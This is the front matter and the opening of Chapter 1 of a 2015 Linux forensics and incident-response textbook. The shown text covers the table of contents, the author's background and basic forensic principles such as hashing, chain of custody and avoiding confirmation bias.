Upload
j2403
View
76
Download
3
Embed Size (px)
DESCRIPTION
Linux Forensics is the most comprehensive and up-to-date resource for those wishing to quickly and efficiently perform forensics on Linux systems. It is also a great asset for anyone that would like to better understand Linux internals. It will guide you step by step through the process of investigating a computer running Linux. Everything you need to know from the moment you receive the call from someone who thinks they have been attacked until the final report is written is covered in this book. All of the tools discussed in this book are free and most are also open source.
Citation preview
LinuxForensics
Copyright(c)2015byPentesterAcademy
All rights reserved.Nopart of this publicationmaybe reproduced, stored in a retrievalsystem,distributed,ortransmittedinanyformorbyanymeans,includingphotocopying,recording,orotherelectronicormechanicalmethods,withoutthepriorwrittenpermissionof thepublisher, except in thecaseofbriefquotationsembodied incritical reviewsandcertainothernoncommercialusespermittedbycopyrightlaw.
Although every precaution has been taken to verify the accuracy of the informationcontained herein, the author and publisher assume no responsibility for any errors oromissions.Noliabilityisassumedfordamagesthatmayresultfromtheuseofinformationcontainedwithin.
Firstpublished:July2015
PublishedbyPentesterAcademy,adivisionofBinarySecurityInnovativeSolutionsPvt.Ltd.
http://www.PentesterAcademy.com
FirstEdition
ContentsAcknowledgements
AuthorBiography
Foreword
Scripts,Videos,TeachingAids,CommunityForumsandmore
Introduction
CHAPTER1FirstStepsINFORMATIONINTHISCHAPTER:
WHATISFORENSICS?
TYPESOFFORENSICS
WHYLINUXFORENSICS?
GENERALPRINCIPLES
MaintainingIntegrity
ChainofCustody
StandardPractices
Documentation
PHASESOFINVESTIGATION
EvidencePreservationandCollection
EvidenceSearching
ReconstructionofEvents
HIGH-LEVELPROCESS
EveryChildisPerfect,JustAskTheParents
BUILDINGATOOLKIT
Hardware
Software
RunningliveLinuxinavirtualmachine
SUMMARY
CHAPTER2DeterminingIfThereWasanIncidentINFORMATIONINTHISCHAPTER:
OPENINGACASE
TALKINGTOUSERS
DOCUMENTATION
Ifyouareusingavirtualmachine,oldermaybebetter
MOUNTINGKNOWN-GOODBINARIES
MINIMIZINGDISTURBANCETOTHESUBJECTSYSTEM
UsingaUSBdrivetostoredata
UsingNetcat
Sendingdatafromthesubjectsystem
Sendingfiles
USINGSCRIPTINGTOAUTOMATETHEPROCESS
Scriptingtheserver
Scriptingtheclient
Shortcircuitingisusefulinmanyplaces
INTRODUCINGOURFIRSTSUBJECTSYSTEM
COLLECTINGVOLATILEDATA
Dateandtimeinformation
Operatingsystemversion
Networkinterfaces
Networkconnections
Openports
Programsassociatedwithvariousports
OpenFiles
RunningProcesses
RoutingTables
Mountedfilesystems
Loadedkernelmodules
Userspastandpresent
Puttingittogetherwithscripting
SUMMARY
CHAPTER3LiveAnalysisINFORMATIONINTHISCHAPTER:
THEREWASANINCIDENT:NOWWHAT?
GETTINGFILEMETADATA
USINGASPREADSHEETPROGRAMTOBUILDATIMELINE
EXAMININGUSERCOMMANDHISTORY
GETTINGLOGFILES
COLLECTINGFILEHASHES
DUMPINGRAM
RAMacquisitionmethods
BuildingLiME
UsingLiMEtodumpRAM
SUMMARY
CHAPTER4CreatingImagesINFORMATIONINTHISCHAPTER:
SHUTTINGDOWNTHESYSTEM
Normalshutdown
Pullingtheplug
IMAGEFORMATS
Rawformat
Proprietaryformatwithembeddedmetadata
Proprietaryformatwithmetadatainaseparatefile
Rawformatwithhashesstoredinaseparatefile
USINGDD
USINGDCFLDD
HARDWAREWRITEBLOCKING
SOFTWAREWRITEBLOCKING
Udevrules
LiveLinuxdistributions
CREATINGANIMAGEFROMAVIRTUALMACHINE
CREATINGANIMAGEFROMAPHYSICALDRIVE
SUMMARY
CHAPTER5MountingImages
INFORMATIONINTHISCHAPTER:
PARTITIONBASICS
MASTERBOOTRECORDPARTITIONS
EXTENDEDPARTITIONS
GUIDPARTITIONS
MOUNTINGPARTITIONSFROMANIMAGEFILEONLINUX
USINGPYTHONTOAUTOMATETHEMOUNTINGPROCESS
MBR-basedprimarypartitions
ScriptingorProgrammingLanguage
MBR-basedextendedpartitions
GPTpartitions
SUMMARY
CHAPTER6AnalyzingMountedImagesINFORMATIONINTHISCHAPTER:
GETTINGMODIFICATION,ACCESS,ANDCREATIONTIMESTAMPS
IMPORTINGINFORMATIONINTOLIBREOFFICE
IMPORTINGDATAINTOMySQL
Whentoolsfailyou
CREATINGATIMELINE
EXAMININGBASHHISTORIES
EXAMININGSYSTEMLOGS
EXAMININGLOGINSANDLOGINATTEMPTS
OPTIONAL–GETTINGALLTHELOGS
SUMMARY
CHAPTER7ExtendedFilesystemsINFORMATIONINTHISCHAPTER:
EXTENDEDFILESYSTEMBASICS
SUPERBLOCKS
EXTENDEDFILESYSTEMFEATURES
CompatibleFeatures
Incompatiblefeatures
Read-onlycompatiblefeatures
USINGPYTHON
Readingthesuperblock
Readingblockgroupdescriptors
Combiningsuperblockandgroupdescriptorinformation
FINDINGTHINGSTHATAREOUTOFPLACE
INODES
ReadinginodeswithPython
Inodeextensionsanddetails
Goingfromaninodetoafile
Extents
Directoryentries
Extendedattributes
JOURNALING
SUMMARY
CHAPTER8MemoryAnalysisINFORMATIONINTHISCHAPTER:
VOLATILITY
CREATINGAVOLATILITYPROFILE
GETTINGPROCESSINFORMATION
PROCESSMAPSANDDUMPS
GETTINGBASHHISTORIES
VOLATILITYCHECKCOMMANDS
GETTINGNETWORKINGINFORMATION
GETTINGFILESYSTEMINFORMATION
MISCELLANEOUSVOLATILITYCOMMANDS
SUMMARY
CHAPTER9DealingwithMoreAdvancedAttackersINFORMATIONINTHISCHAPTER:
SUMMARYOFTHEPFEATTACK
THESCENARIO
INITIALLIVERESPONSE
MEMORYANALYSIS
FILESYSTEMANALYSIS
LEVERAGINGMYSQL
MISCELLANEOUSFINDINGS
SUMMARYOFFINDINGSANDNEXTSTEPS
SUMMARY
CHAPTER10MalwareINFORMATIONINTHISCHAPTER:
ISITMALWARE?
Thefilecommand
Isitaknown-badfile?
Usingstrings
Listingsymbolinformationwithnm
Listingsharedlibrarieswithldd
ITHINKITISMALWARE
Gettingthebigpicturewithreadelf
Usingobjdumptodisassemblecode
DYNAMICANALYSIS
Tracingsystemcalls
Tracinglibrarycalls
UsingtheGNUDebuggerforreverseengineering
OBFUSCATION
SUMMARY
CHAPTER11TheRoadAheadINFORMATIONINTHISCHAPTER:
NOWWHAT?
COMMUNITIES
LEARNINGMORE
CONGREGATE
CERTIFY
AcknowledgementsFirstandforemostIwouldliketothankmywifeandchildrenforallowingmetotakethetimetowritethisbook.Thisbookwouldneverhavehappenedwithouttheirsupport.
Many thanks to Vivek Ramachandran and the whole Pentester Academy team forhonoringmetwice.First,IhadtheprivilegeofbeingthefirstexternaltrainerforPentesterAcademy. Second, I was granted the ability to author the first book ever published byPentesterAcademy.
MydeepestthanksgotoDr.SusanBakerforgraciouslyofferingtoreadthisentirebookandserveascopyeditor.
Finally, I would like to my many supportive friends in the information securitycommunitywhohaveprovidedencouragementtomethroughouttheyears.
AuthorBiographyDr. Philip Polstra (known to his friends as Dr. Phil) is an internationally recognizedhardwarehacker.Hisworkhasbeenpresentedatnumerousconferencesaroundtheglobeincluding repeat performances at DEFCON, BlackHat, 44CON, GrrCON, MakerFaire,ForenSecure, and other top conferences. Dr. Polstra is a well-known expert on USBforensicsandhaspublishedseveralarticlesonthistopic.HehasdevelopedanumberofvideocoursesincludingonesonLinuxforensics,USBforensics,andreverseengineering.
Dr.PolstrahasdevelopeddegreeprogramsindigitalforensicsandethicalhackingwhileservingasaprofessorandHackerinResidenceataprivateuniversityintheMidwesternUnitedStates.HecurrentlyteachescomputerscienceanddigitalforensicsatBloomsburgUniversity of Pennsylvania. In addition to teaching, he provides training and performspenetrationtestsonaconsultingbasis.Whennotworking,hehasbeenknowntofly,buildaircraft, and tinker with electronics. His latest happenings can be found on his blog:http://polstra.org.Youcanalsofollowhimat@ppolstraonTwitter.
ForewordHelloAll!
PhilandImetonlinearoundfiveyearsbackthroughSecurityTube.netandwe’vebeengreat friends ever since. Over the years, we discussed interesting projects we couldcollaborate on and information security education was on top of our list as expected.Based on our discussions, Phil created an excellent “USB Forensics” and “LinuxForensics”videoseriesforPentesterAcademy!Both thevideoserieswerefantasticandwellreceivedbyourstudents.
I’d always wanted to convert our online video series into books and Phil’s “LinuxForensics” video course seemed like the best place to start this adventure! And so wehave! I’d like to take thisopportunity towishPhilandmypublishing teamatPentesterAcademybonvoyageonthisnewendeavor!
Finally but most importantly, I’d like to thank the SecurityTube.net and PentesterAcademycommunityandourstudentsfortheirloveandsupportovertheyears!Wewouldnotbehere todaywithoutyouguys!You’vemadeallourdreamscometrue.Wecannotthankyouenough.
VivekRamachandran
Founder,SecurityTube.netandPentesterAcademy
Scripts,Videos,TeachingAids,CommunityForumsandmoreBookwebsiteWe’vecreatedtwomirrorwebsitesforthe“LinuxForensics”book:
http://www.pentesteracademy.com/bookshttp://www.linuxforensicsbook.com
ScriptsandSupportingFilesAllPythonandshellscriptshavebeenmadeavailablefordownloadonthewebsite.We’vetried our best to ensure that the codeworks and is error free but if you find any bugspleasereportthemandwewillpubliclyacknowledgeyouonthewebsite.
VideosWe are Pentester Academy and we love videos! Though the book is completely self-sufficientwe thought itwould be fun to have videos for a select few labs by the bookauthorhimself!YoucanaccesstheseforFREEonthebookwebsite.
CommunityForumsWewouldlovetoconnectwithourbookreaders–gettheirfeedbackandknowfromthemfirsthandwhattheywouldliketoseeinthenextedition?Also,wouldn’titbegreattohavea community forum where readers could interact with each other and even with theauthor!Ourbookcommunityforumsdojustthat!Youcanaccesstheforumsthroughthewebsitementionedabove.
TeachingAidsAre you a professor or a commercial trainer? Do you want to use this book in class?We’vegotyourcovered!Throughourwebsite,youcanregisterasatrainerandgetaccesstoteachingaidssuchaspresentations,exercisefilesandotherteachingaids.
LinuxForensicsBookSwag!Visit the swag section on our website and get your “Linux Forensics” T-Shirts, mugs,keychainsandothercoolswags!
IntroductionInformationinThisChapter:
WhatthisbookisaboutIntendedaudienceHowthisbookisorganized
WhatthisbookisaboutThis book is about performing forensic investigations on subject systems running theLinuxoperatingsystem.InmanycasesLinuxforensicsissomethingthatisdoneaspartofincidentresponse.Thatwillbethefocusofthisbook.Thatsaid,muchofwhatyouneedtoknow in order to perform Linux incident response can also be applied to any Linuxforensicinvestigation.
AlongthewaywewilllearnhowtobetteruseLinuxandthemanytoolsitprovides.Inadditiontocoveringtheessentialsofforensics,wewillexplorehowtousePython,shellscripting, and standardLinux system tools tomore quickly and easily perform forensicinvestigations.Much ofwhat is covered in this book can also be leveraged by anyonewishing to perform forensic investigations of Windows subjects on a Linux-basedforensicsworkstation.
IntendedaudienceThisbookisprimarilyintendedtobereadbyforensicspractitionersandotherinformationsecurityprofessionals.ItdescribesindetailhowtoinvestigatecomputersrunningLinux.ForensicinvestigatorswhoworkprimarilywithWindowssubjectswhowouldliketolearnmore about Linux should find this book useful. This book should also prove useful toLinux users and system administrators who are interested in the mechanics of Linuxsystembreachesandensuing investigations.The informationcontainedwithin thisbookshouldallowapersontoinvestigatethemajorityofattackstoLinuxsystems.
TheonlyknowledgeareaderofthisbookisassumedtohaveisthatofanormalLinuxuser.YouneednotbeaLinuxsystemadministrator,hacker,orpowerusertolearnfromthis book. Knowledge of Linux system administration, Python, shell scripting, andAssembly would be helpful, but definitely not required. Sufficient information will beprovidedforthosenewtothesetopics.
HowthisbookisorganizedThis book beginswith a brief introduction to forensics. From therewewill delve intoansweringthequestion,“Wasthereanincident?”Inordertoanswerthisquestion,variouslive analysis tools and techniques will be presented.We then discuss the creation andanalysisofforensicfilesystemandmemoryimages.AdvancedattacksonLinuxsystemsandmalwareroundoutourdiscussion.
Chapter1:FirstStepsChapter 1 is an introduction to the field of forensics. It covers the various types offorensics and motivation for performing forensics on Linux systems. Phases ofinvestigationsandthehigh-levelprocessarealsodiscussed.Step-by-stepinstructionsforbuildingaLinuxforensicstoolkitareprovidedinthischapter.
Chapter2:Wasthereanincident?Chapter2walksyou throughwhathappens from thepointwhereaclientwhosuspectssomethinghashappenedcallsuntilyoucanbereasonablysurewhethertherewasorwasnot an incident. It covers opening a case, talking to users, creating appropriatedocumentation, mounting known-good binaries, minimizing disturbance to the subjectsystem, using scripting to automate the process, and collecting volatile data. A niceintroductiontoshellscriptingisalsoprovidedinthischapter.
Chapter3:LiveAnalysisChapter 3 describes what to do before shutting down the subject system. It coverscapturingfilemetadata,buildingtimelines,collectingusercommandhistories,performinglogfileanalysis,hashing,dumpingmemory,andautomatingwithscripting.AnumberofnewshellscriptingtechniquesandLinuxsystemtoolsarealsopresentedinthischapter.
Chapter4:CreatingImagesChapter4startswithadiscussionoftheoptionsforshuttingdownasubjectsystem.Fromthere the discussion turns to tools and techniques used to create a forensic image of afilesystem.Topicscoveredincludeshuttingdownthesystem,imageformats,usingddanddcfldd, hardware and softwarewrite blocking, and liveLinux distributions.Methods ofcreatingimagesfordifferentcircumstancesarediscussedindetail.
Chapter5:MountingImagesChapter 5beginswith adiscussionof thevarious typesof partitioning systems:MasterBoot Record (MBR) based partitions, extended partitions, and GUID partition tables.Linuxcommandsandtechniquesusedtomountalltypesofpartitionsarepresented.Thechapter ends with an introduction to Python and how it can be used to automate theprocessofmountingpartitions.
Chapter6:AnalyzingMountedImagesChapter6describeshow toanalyzemounted filesystem images. It covers filemetadata,commandhistories,systemlogs,andothercommoninformationinvestigatedduringdeadanalysis.Useof spreadsheets andMySQL to enhance investigations is discussed.Somenewshellscriptingtechniquesarealsopresented.
Chapter7:ExtendedFilesystems
Chapter 7 is the largest chapter in this book.All aspects ofLinux extended filesystems(ext2,ext3,andext4)arediscussedindetail.AnextensivesetofPythonandshellscriptsarepresentedinthischapter.Advancedtechniquesfordetectingalterationsofmetadatabyanattackerareprovidedinthischapter.
Chapter8:MemoryAnalysisChapter8 introduces thenew fieldofmemoryanalysis.TheVolatilitymemoryanalysisframework is discussed in detail. Topics covered include creating Volatility profiles,getting process information, process maps and dumps, getting bash histories, usingVolatility check plugins, retrieving network information, and obtaining in-memoryfilesyteminformation.
Chapter9:DealingwithMoreAdvancedAttackersChapter 9 walks you through a more sophisticated attack in detail. The techniquesdescribeduptothispointinthebookareappliedtoanewscenario.Reportingoffindingstotheclientisalsodiscussed.
Chapter10:MalwareChapter10providesan introduction toLinuxmalwareanalysis. Itcoversstandard toolsforinvestigatingunknownfilessuchasthefileutility,hashdatabases, thestringsutility,nm,ldd,readelf,objdump,strace, ltrace,andgdb.Obfuscationtechniquesarediscussed.Safetyissuesarepresented.AnintroductiontoAssemblyisalsoprovided.
Chapter11:TheRoadAheadIn this final chapter several suggestions for further study are provided.General tips arealsogivenforasuccessfulcareerinvolvingforensics.
ConclusionCountlesshourshavebeenspentdeveloping thisbookandaccompanyingscripts. Ithasbeenalaboroflove,however.IhopeyouenjoyreadingandactuallyapplyingwhatisinthisbookasmuchasIhaveenjoyedwritingit.
For updates to this book and also my latest happenings consult my websitehttp://philpolstra.com. You can also contact me via my Twitter account, @ppolstra.Downloads related to the book and other forms of community support are available atPentesterAcademyhttp://pentesteracademy.com.
CHAPTER
1FirstStepsINFORMATIONINTHISCHAPTER:
Whatisforensics?TypesofforensicsWhyLinuxforensics?GeneralprinciplesPhasesofinvestigationHigh-levelprocessBuildingatoolkit
WHATISFORENSICS?AnaturalquestiontoaskyourselfifyouarereadingabookonLinuxforensicsis:Whatisforensicsanyway?Ifyouaskdifferentforensicexaminersyouarelikelytoreceiveslightlydifferentanswerstothisquestion.AccordingtoarecentversionoftheMerriam-Websterdictionary: “Forensic (n) belonging to, used in, or suitable to courts of judicature or topublicdiscussionanddebate.”Usingthisdefinitionofthewordforensicmydefinitionofforensicscienceisasfollows:
Forensic science or forensics is the scientific collection of evidence of sufficientqualitythatitissuitableforuseincourt.
The key point to keep inmind is thatwe should be collecting evidence of sufficientqualitythatwecanuseitincourt,evenifweneverintendtogotocourtwithourfindings.Itisalwayseasiertorelaxourstandardsthantotightenthemlater.Weshouldalsoactlikescientists,doingeverythinginamethodicalandtechnicallysoundmanner.
TYPESOFFORENSICSWhenmostpeoplehearthetermforensicstheythinkaboutthingstheymighthaveseenonshows such as CSI. This is what I refer to as physical forensics. Some of the morecommonlyencounteredareasofphysical forensics include fingerprints,DNA,ballistics,and blood spatter. One of the fundamental principles of physical forensics is Locard’sTransfer (or Exchange) Principle. Locard essentially said that if objects interact, theytransfer(orexchange)material.Forexample,ifyouhitsomethingwithyourcarthereisoften an exchange of paint.As further examples,when you touch a surface youmightleavefingerprintsandyoumighttakedirtwithyouonyourshoeswhenyouleaveanarea.
ThisbookcoverswhatIwouldrefertoasdigitalforensics.Somelikethetermcomputer
forensics,but Ipreferdigital forensics as it ismuchbroader.We live in aworld that isincreasingly reliant on electronic devices such as smart phones, tablets, laptops, anddesktop computers.Given the amount of informationmany people store on their smartphonesandothersmalldevices,itisoftenusefultoexaminethosedevicesifsomeoneissuspectedofsomesortofcrime.Thescopeof thisbook is limited tocomputers (whichcouldbeembedded)runningaversionofLinux.
There are many specializations within the broader space of digital forensics. Theseinclude network forensics, data storage forensics, small device forensics, computerforensics, and many other areas. Within these specializations there are furthersubdivisions.Itisnotunusualforforensicexaminerstobehighlyspecialized.MyhopeisthatbythetimeyoufinishthisbookyouwillbeproficientenoughwithLinuxforensicstoperforminvestigationsofallbutthemostadvancedattackstoLinuxsystems.
WHYLINUXFORENSICS?PresumablyifyouarereadingthisyouseethevalueinlearningLinuxforensics.Thesamemaynotbetrueofyourbossandothers,however.HereissomeammunitionforthemonwhyyoumightbenefitfromstudyingLinuxforensics.
WhileLinuxisnotthemostcommonoperatingsystemonthedesktop,itispresentinmanyplaces.EvenintheUnitedStates,whereWindowstendstodominatethedesktops,manyorganizations runLinux in the server room.Linux is the choiceofmany InternetServiceProviders (ISP)and largecompanies suchasGoogle (theyevenhave theirownflavorofLinux).Linuxisalsoextremelypopularindevelopmentorganizations.
Linuxisthestandardchoiceforanyoneworkingininformationsecurityorforensics.Astheoperatingsystems“byprogrammersforprogrammers,” it isverypopularwithblackhathackers.Ifyoufindyourselfexaminingtheblackhat’scomputer,it islikelyrunningLinux.
Many devices all around us are running some version of Linux. Whether it is thewireless access point that you bought at the local electronics store or the smarttemperature controller keeping your home comfortable, they are likely running Linuxunderthehood.LinuxalsosharessomeheritageandfunctionalitywithAndroidandOSX.
LinuxisalsoagreatplatformforperformingforensicsonWindows,OSX,Androidorothersystems.Theoperatingsystemisrichwithfreeandopensourcetoolsforperformingforensicsondevicesrunningvirtuallyeveryoperatingsystemontheplanet.Ifyourbudgetislimited,Linuxisdefinitelythewaytogo.
GENERALPRINCIPLESThereareanumberofgeneralguidingprinciplesthatshouldbefollowedwhenpracticingforensics.These includemaintaining the integrity of evidence,maintaining the chain ofcustody, following standard practice, and fully documenting everything. These arediscussedinmoredetailbelow.
MaintainingIntegrityItisoftheutmostimportancethatevidencenotbealteredwhileitisbeingcollectedandexamined.Wearefortunate indigital forensics thatwecannormallymakeanunlimitednumberofidenticalcopiesofevidence.Thoseworkingwithphysicalforensicsarenotsolucky.Infact, inmanycasesdifficultchoicesmustbemadewhenquantitiesofphysicalevidencearelimitedasmanytestsconsumeevidence.
The primary method of insuring integrity of digital evidence is hashing. Hashing iswidely used in computer science as away of improving performance.Ahash function,generallyspeaking, takesan inputofvariablesizeandoutputsanumberofknownsize.Hashingallows for faster searchesbecausecomputerscancompare twonumbers inoneclock cycle versus iterating over every character in a long string which could requirehundredsorthousandsofclockcycles.
Usinghashfunctionsinyourprogramscanaddalittlecomplicationbecausemorethanone input value can produce the same hash output. When this happens we say that acollisionhas occurred.Collisions are a complication in our programs, butwhenwe areusing hashes for encryption or integrity checking the possibility of many collisions isunacceptable. To minimize the number of collisions we must use cryptographic hashfunctions.
There are several cryptographic hash functions available. Some people still use theMessageDigest5(MD5)toverifyintegrityofimages.TheMD5algorithmisnolongerconsidered to be secure and the Secure Hash Algorithm (SHA) family of functions ispreferred.Theoriginalversion is referred toasSHA1(or justSHA).SHA2iscurrentlythemostcommonlyusedvariantandyoumayencounterreferences toSHA2(224bits),SHA256 (256 bits), SHA384 (384 bits), and SHA512 (512 bits). There is a SHA3algorithm, but its use is not yet widespread. I normally use SHA256 which is a goodmiddlegroundofferinggoodperformancewithlowchancesofcollisions.
Wewilldiscussthedetailsofusinghashinginfuturechapters.Fornowthehighlevelprocessisasfollows.First,calculateahashoftheoriginal.Second,createanimagewhichwewill treat as amaster copy. Third, calculate the hash of the copy and verify that itmatchesthehashoftheoriginal.Fourth,makeworkingcopiesofyourmastercopy.Themastercopyandoriginalshouldneverbeusedagain.Whileitmayseemstrange,thehashon working copies should be periodically recalculated as a double check that theinvestigatordidnotaltertheimage.
ChainofCustodyPhysical evidence is often stored in evidence bags. Evidence bags either incorporate achain of custody form or have such a form attached to them. Each time evidence isremovedfromthebagtheformisupdatedwithwhotouchedtheevidenceandwhatwasdone.Thecollectionofentriesonthisformmakeupthechainofcustody.Essentiallythechain of custody is a guarantee that the evidence has not been altered and has beenproperlymaintained.
In the case of digital forensics the chain of custody is still important.Whilewe canmakeunlimiteddigitalcopies,wemuststillmaintaintheintegrityoftheoriginal.Thisisalsowhyamastercopyshouldbemadethatisneverusedtoforanyotherpurposethancreatingworkingcopiesasitpreventstheneedtotouchtheoriginalotherthanfortheone-timeeventofcreatingthemastercopy.
StandardPracticesFollowing standard practices makes your investigation easier. By following a writtenprocedure accurately there is less explaining to do if you should find yourself in court.Youarealsolesslikelytoforgetsomethingormakeamistake.Additionally,ifyoufollowstandardpracticesthereislessdocumentationthathastobedone.Itusedtobesaidthat“nobodywaseverfiredforbuyingIBM.”Similarly,noforensicinvestigatorevergotintotroubleusingwrittenproceduresthatconformtoindustrystandardpractice.
DocumentationWhen in doubt document. It never hurts to overdo the documentation. As mentionedpreviously,ifyoufollowstandardwrittenproceduresyoucanreferencethemasopposedtorepeatingtheminyournotes.Speakingofnotes, I recommendhandwrittennotes inaboundnotebookwithnumberedpages.Thismightsoundstrangetoreaderswhoareusedtousingcomputersforeverything,butitismuchquickertojotnotesontopaper.Itisalsoeasiertocarryasetofhandwrittennotestocourt.
Theboundnotebookhasotheradvantagesaswell.Nopowerisrequiredtoviewthesenotes.Theuseofaboundnotebookwithnumberedpagesalsomakesitmoredifficulttoalter your notes. Not that you would alter them, but a lawyer might not be beyondaccusing you of such a thing. If you have difficulty finding a notebookwith numberedpagesyoucannumberthemyourselfbeforeuse.
Ifyoucanworkwith someoneelse it is ideal.Pilots routinelyusechecklists tomakesuretheydon’tmissanything.Commercialpilotsworkinpairsasextrainsuranceagainstmistakes.Workingwithapartnerallowsyoutohaveasecondsetofeyes,letsyouworkmorequickly,andalsomakesitevenharderforsomeonetoaccuseyouoftamperingwithevidence. History is replete with examples of people who have avoided conviction byaccusingsomeoneofevidencetamperingandinstillingsufficientdoubtinajury.
Fewpeoplelovetododocumentation.Thisseemstobetruetoagreaterextentamongtechnicalpeople.Therearesometoolsthatcaneasethepainofdocumentingyourfindingsthatwillbediscussedinlaterchaptersofthisbook.Aninvestigationisneveroveruntilthedocumentationisfinished.
PHASESOFINVESTIGATIONThere are three phases to a forensic investigation: evidence preservation, evidencesearching,andeventreconstruction.Itisnotunusualfortheretobesomecyclingbetweenthephasesasaninvestigationproceeds.Thesephasesaredescribedinmoredetailbelow.
EvidencePreservationandCollectionMedicalprofessionalshaveasaying“Firstdonoharm.”Fordigitalforensicspractitionersourmottoshouldbe“Don’talterthedata.”Thissoundssimpleenough.Inactualityitisabitmorecomplicatedasdataisvolatile.Thereisahierarchyofvolatilitythatexistsindatafoundinanysystem.
Themostvolatile data canbe found inCPU registers.These registers arehigh speedscratch memory locations. Capturing their contents is next to impossible. Fortunately,thereislittleforensicvalueinthesecontents.CPUcachesarethenextleveldownintermsofvolatility.Likeregisterstheyarehardtocaptureandalso,thankfully,oflittleforensicvalue.
SlightlylessvolatilethanstorageintheCPUarebuffersfoundinvariousdevicessuchasnetworkcards.Notallinput/outputdeviceshavetheirownstoragebuffers.Somelow-speeddevicesusemainsystemmemory(RAM)forbuffering.AswithdatastoredintheCPU,thisdataisdifficulttocapture.Intheory,anythingstoredinthesebuffersshouldbereplicated in system memory assuming it came from or was destined for the targetcomputer.
System memory is also volatile. Once power has been lost, RAM is cleared.Whencomparedtopreviouslydiscusseditems,systemmemoryisrelativelyeasytocapture.Inmostcases it isnotpossible tocollect thecontentsofsystemmemorywithoutchangingmemory contents slightly. An exception to this would be hardware-based memorycollection.Memoryacquisitionwillbediscussedingreaterdetailinalaterchapter.
Duetolimitationsintechnology,untilrecentlymuchofdigitalforensicswasfocusedon“deadanalysis”ofimagesfromharddrivesandothermedia.Evenwhendealingwithnon-volatilemedia,volatilityisstillanissue.Oneoftheoldestquestionsincomputersecurityand forensics is whether or not to pull the plug on a system you suspect has beencompromised.
Pulling the plug can lead to data loss as anything cached for writing to media willdisappear.Onmodernjournalingfilesystems(byfarthemostcommonsituationonLinuxsystemstoday)thisislessofanissueasthejournalcanbeusedtocorrectanycorruption.Ifthesystemisshutdowninthenormalmannersomemalwarewillattempttocoveritstracksorevenworsedestroyotherdataonthesystem.
Executing a normal shutdown has the advantage of flushing buffers and caches. Aspreviously mentioned, the orderly shutdown is not without possible disadvantages. Aswith many things in forensics, the correct answer as to which method is better is, “itdepends.”Therearemethodsofobtainingimagesofharddrivesandothermediawhichdonot require a systemshutdownwhich further complicates this decision.Details of thesemethodswillbepresentedinfuturechapters.
EvidenceSearchingThanks to theexplosionofstoragecapacity itbecomesharder to locateevidencewithin
the seaofdata stored ina typicalcomputerwitheachpassingyear.Dataexistsat threelevels,data,information,andevidence,asshowninFigure1.1.
FIGURE1.1
Thedatahierarchy.
AsshowninFigure1.1,thelowestlevelofdataisjustrawdata.Rawdataconsistsofbits,normallyorganizedasbytes, involatileornon-volatilestorage.In thiscategorywefindthingssuchasrawdisksectors.Itcanbeachallengetousedataatthislevelandonmostmodernsystemsthereisplentyofdataouttheretopickthrough.
Aboverawdatawehaveinformation.Informationconsistsofrawdatawithsomesortofmeaningattachedtoit.Forexample,animagehasmoremeaningtoahumanthanthebitsthatmakeupaJPEGfileusedtostoretheimage.Eventextfilesexistatthislevelinour hierarchy. Bringing many bytes of ASCII or Unicode values together gives themmeaningbeyondtheircollectionofbytes.
At the highest level in or hierarchy is evidence. While there may be thousands ormillionsoffiles(collectionsofinformation)itisunlikelythatthebulkofthemhaveanyrelevancetoaninvestigation.Thisleadsustoponderwhatitmeansforinformationtoberelevanttoaninvestigation.
Aspreviouslymentioned,forensicsisascience.Giventhatwearetryingtodoscience,weshouldbedevelopinghypothesesandthensearchingforinformationthatsupportsorrefutes a hypothesis. It is important to remain objective during an investigation as thesamepieceof evidencemightbe interpreteddifferentlybasedonpeople’spreconceivednotions.
Itisextremelyimportantthatinvestigatorsdonotbecomevictimsofconfirmationbias.Put simply, confirmation bias is only looking at information that supports what you
believetobetruewhilediscountinganythingthatwouldrefutewhatyoubelieve.Giventheamountofdata thatmustbeexaminedina typical investigationahypothesisor twoconcerningwhatyouthinkyouwill findisgood(theownerof thecomputerdidX, thiscomputer was successfully exploited, etc.) to help guide you through the searchingprocess.Don’t fall into the trapof assumingyourhypothesis or hypotheses are correct,however.
CONFIRMATIONBIASINACTIONEveryChildisPerfect,JustAskTheParentsOne of the best stories to describe confirmation bias goes as follows. Johnny lovedmagicians.Onedayhisparentstookhimtoseeafamousmagician,PhiltheGreat.Attheendof theshow theparents toldPhilhowmuch their son lovedmagic.Phil thenofferedtoshowthematrick.Johnnyeagerlyaccepted.
Themagicianproceededtopulloutacoinandmoveitbackandforthbetweenbothhandsthenclosedhisfistsandheldouthishands.HeaskedJohnnytoidentifythehandcontaining the coin, which he did correctly. Now guessing correctly one time is notmuchofafeat,butthisgamewasrepeatedmanytimesandeachtimeJohnnycorrectlyguessed the hand containing the coin. While this was going on the magician madecommentslike,“Youmusthaveexcellentvisiontoseewhichhandcontainsthecoin,”and“Youmustbeanexpertonreadingmyfacialexpressionsandthatishowyouknowwherethecoinis.”
Eventually Johnny had correctly identified the handwith the coin fifty times in arow!Hisparentswereamazed.TheycalledthegrandparentsandtoldalloftheirfriendsaboutitonFacebook,Twitter,andothersocialmediasites.Whentheyfinallythankedthemagicianandturnedtoleave,heshouted,“goodbye,”andwavedwithbothhands.Eachhandcontainedacoin.
Itwas theparents’confirmationbias that lead themtobelievewhat theywanted tobelieve,thatJohnnywasasavant,anddistractedthemfromthetruth,thatthemagicianwasindeedtrickingthem.Remainobjectiveduringaninvestigation.Don’tletwhatyouoryourbosswanttobetruekeepyoufromseeingcontraryevidence.
ReconstructionofEventsInmymindtryingtoreconstructwhathappenedisthemostfunpartofaninvestigation.Theexplosioninsizeofstoragemediamightmakethesearchingphaselongerthanitwasinthepast,butthatonlyhelpstomakethereconstructionphasethatmuchmoreenjoyable.It is very unlikely that you will find all the evidence you need for your eventreconstructioninoneplace.Itismuchmorecommontogetlittlepiecesofevidencefrommultiple placeswhich you put together into a larger picture. For example, a suspiciousprocess in a process list stored in amemory imagemight leadyou to look at files in a
filesystem imagewhichmight lead you back to an open file list in thememory imagewhichinturnpointstowardfilesinthefilesystemimage.Puttingallofthesebitstogethermightallowyoutodeterminewhenandbywhomarootkitwasdownloadedandwhenandbywhichuseritwassubsequentlyinstalled.
HIGH-LEVELPROCESSWhilenoteveryLinuxforensicinvestigationispartofanincidentresponse,itwillbethefocus of this book. The justification for this is that the vastmajority of Linux forensicinvestigations are conducted after a suspected breach. Additionally, many of the itemsdiscussed in this bookwill be relevant to other Linux investigations aswell. The highlevelprocessforincidentresponseisshowninFigure1.2.
FIGURE1.2
High-levelProcessforLinuxIncidentResponse
